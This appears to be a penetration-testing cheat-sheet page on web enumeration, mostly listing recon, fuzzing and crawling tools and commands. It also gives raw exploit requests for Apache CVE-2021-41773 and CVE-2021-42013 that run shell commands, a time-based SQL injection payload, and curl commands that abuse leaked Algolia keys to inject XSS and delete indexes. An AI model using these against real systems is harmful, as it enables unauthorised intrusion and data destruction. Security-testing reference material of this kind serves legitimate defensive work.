Web Enumeration
Recon, fuzzing and crawling
Recon
Also check for other exposed ports. Ex: 22, look for regsshion, etc. See Protocols
nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
Leverage Shodan and find CVE
EyeWitness or Aquatone - See Information Gathering
Fingerprinting / CrawlingSSL / TLS
HTTP/2 - DoS
Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487
HTTP Downgrading
HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2.
Open Burp Suite and Navigate to Proxy → HTTP History
Locate the request that is currently using HTTP/2.
Send the Request to Repeater
In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol
Change HTTP Version to HTTP/1.1
Click "Send" in Repeater.
If successful, you should receive a valid response, confirming the server accepts HTTP/1.1.
Now, test for request smuggling
HTTP Request SmugglingHTTP Methods
HTTP Verb TamperingApache Vulnerability Testing
CVE-2021-41773 (RCE and LFI)
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id
CVE-2021-42013 (RCE and LFI)
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
Scan for credz
Header Exploit
Common files
.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock
robots.txt
-> robofinder: search for and retrieve historical robots.txt
files from Archive.org for any given website.
.git
.svn
.DS_Store
.env

# python ds_store_exp.py http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
Cloudflare
Real IP adress
Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
Internal IP leakage
/cdn-cgi/trace
on live hosts — it leaks internal IPs
sitemap.xml
Time based SQL injection: sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#]
= 9s
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
Misconfigurations on popular third-party services

Git Exposed
DotGit Extension - Firefox and Chrome https://addons.mozilla.org/en-US/firefox/addon/dotgit/
cat domains.txt | nuclei -t gitExposed.yaml
Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml
id: git-exposed
info:
name: Exposed Git Repository
author: kaks3c
severity: medium
description: |
Checks for exposed Git repositories by making requests to potential Git repository paths.
tags: p3,logs,git
http:
- raw:
- |
GET {{BaseURL}}{{path}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
attack: pitchfork
payloads:
path:
- /.git/
- /.git/HEAD
- /.git/config
- /.git/logs/HEAD
- /.git/logs/
- /.git/description
- /.git/refs/heads/
- /.git/refs/remotes/
- /.git/objects/
matchers-condition: or
matchers:
- type: word
words:
- "commit (initial): Initial commit" #/.git/logs/HEAD
- "ref: refs/heads/" #/.git/HEAD
- "logallrefupdates = true" #/.git/config
- "repositoryformatversion = 0" #/.git/config
- "Index of /" #/.git/
- "You do not have permission to access /.git/" #403_/.git
- "Unnamed repository; edit this file 'description' to name the repository" #/.git/description
- type: regex
regex:
- "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
- "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
- "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
- "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
- "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/logs/
stop-at-first-match: true
.git
found => download the target .git
folder
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/
Or with tools:
$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb
After that, search for creds, vulnerabilities, etc:
Credentials in git reposGitHub - finding vulnerabilitiesSVN Expoxed
./svn-extractor.py --url http://url.com --match database.php
PHPMyAdmin
target[.]com/phpmyadmin/setup/index.php
==> 301 to login page
target[.]com/phpMyAdmin/setup/index.php
==> 200 to phpmyadmin setup
AdminDirectoryFinder
WSAAR
OWASP Noir

$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan
URLScan.io
Check URLScan as a complement to Wayback Machine
Information GatheringWaybackLister
Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings
python waybacklister.py -d target.com
Wayback Machine
# RECON METHOD BY ~/.COFFINXP
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
waymore -i target.com -mode U -oU urls.txt
Download pages and extract JS (mode R)
waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/*
Backup Files
ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080
Fuzzili
echo http://target.com | fuzzuli -p
Burp Extension
Archived Backups
Look for metadata
Extract URLs and paths from web pages
Manually
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Open Console (ctrl + shift + i) + Allow pasting
("autoriser le collage
") + copy paste JS code + click on bookmark


Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Gourlex
gourlex -t domain.com
xnLinkFinder
xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v
Command breakdown:
-i http://bugcrowd.com → Target domain
-sp https://bugcrowd.com → Scope prefix
-sf "bugcrowd.*" → Scope filter
-d 2 → Crawl depth
https://github.com/mhmdiaa/chronos
-v → Verbose output
Hakrawler
echo https://google.com | hakrawler
Waybackurls
Katana & Urlfinder
katana -u https://tesla.com
urlfinder -d tesla.com
GetAllURL - gau
gau https://target.com
LinkFinder
python3 linkfinder.py -i https://example.com/app.js
$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli
GoLinkFinder
Faster than LinkFinder
golinkfinder -file js_files.txt -output results.json
LazyEgg
ReconSpider
Secrets in Response
Detects sensitive information leaks in HTTP responses using custom regex-based signatures
Metadata
Metadata and Hidden infosJS Files
Sensitive JS Files
ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
Burp

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA


wget -i urls.txt
Detect secrets
./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"
Burp Extension
Code Analysis
Code Analysissemgrep scan --config auto

JSFScan.sh
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
bash JFScan.sh -l target.txt --all -r -o outputdir
Morgan
Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites
Gouge - Burp extension to extract URLs which are seen in JS files
GetJS
JSHunter
Endpoint Extraction and Sensitive Data Detection
cat urls.txt | grep "\.js" | jshunter
Javascript Deobfuscator
Online
API Endpoint - Burp History

API Endpoint in JS File
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
JSNinja
JS Link Finder
Jsluice
APISensitive data in JS Files
Top 25 JavaScript path files used to store sensitive information
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

JS Miner - Burp Extension
X-Keys - Burp Extension
jsluice++ - Burp Extension

SecretFinder
Mantra
Testing API Key
Google Maps API Key
Algolia API Key
Check ACL:
https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY
The most damaging permissions are
addObject: Allows adding/updating an object in the index. (Copying/moving indices are also allowed with this permission.)
deleteObject: Allows deleting an existing object.
deleteIndex: Allows deleting an index (will break search completely)
editSettings: Allows changing index settings. - this also allows you to run javascript when the search is used.
listIndexes: Allows listing all accessible indices.
logs: this will allow you to view the search logs, which can include IP Addresses and sensitive cookies.
Abuse editSettings to put an XSS paylaod:
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
List indexes
curl -X GET \
"https://{appID}-dsn.algolia.net/1/indexes/" \
-H "X-Algolia-API-Key: {api-key}" \
-H "X-Algolia-Application-Id: {appID}"
Retrieve/read the data of a resource from the server:
settings
curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>'
Specific index
curl -X GET \
"https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \
-H "X-Algolia-API-Key: {apikey}" \
-H "X-Algolia-Application-Id: {appID}"
Update a resource on the server.
curl -X PATCH --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>' --data '{"highlightPreTag": "This is hacked"}'
Delete Index - DON'T DO THIS ON PRODUCTION ENVIRONMENT
curl -X DELETE \
"https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"
Hidden Parameter
This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible
Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

Parameters fuzzing
Burp - Param Miner
right-click, extension>Param Miner> Guess params> Guess GET parameters.



Burp - GAP
GetAllParams
x8
Hidden parameters discovery
Arjun
$ python3 /opt/Arjun/arjun.py -u http://target_address.com
$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json
If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:
$ python3 /opt/Arjun/arjun.py -i burp_targets.txt
Parmahunter
Wordlists
Try /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt
first, then https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt
dirb lists
Common extensions:
raft-[ small | medium | large ]-extensions.txt
from SecList Web-ContentCreate wordlist - CeWL
cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10
Fuzz using different HTTP methods
ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD
Admin interfaces
Backups
Config files
SQL files
Vulnerability Assessment
Vulnerability ScannersPort Scansudo nmap 10.129.2.28 -p 80 -sV --script vuln
Nmap scan report for 10.129.2.28
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.4
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
Lostfuzzer
Admin interface
Password listsCMS
CMSCrawling
Crawl with 2 separate user-agent
Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes!
gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt

Gospider
Hakrawler
With Burp
With Zap
sudo snap install zaproxy --classic
Spidering

Fuzzing

Fuzz
Fuzzinggobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS
Admin interface=> Password guessing
Banner grabbing
curl -IL https://www.inlanefreight.com
Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone
Information Gatheringwhatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
DNS Subdomain Enumeration
DNS Subdomain EnumerationCloudflare Bypass for Web Scraping
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated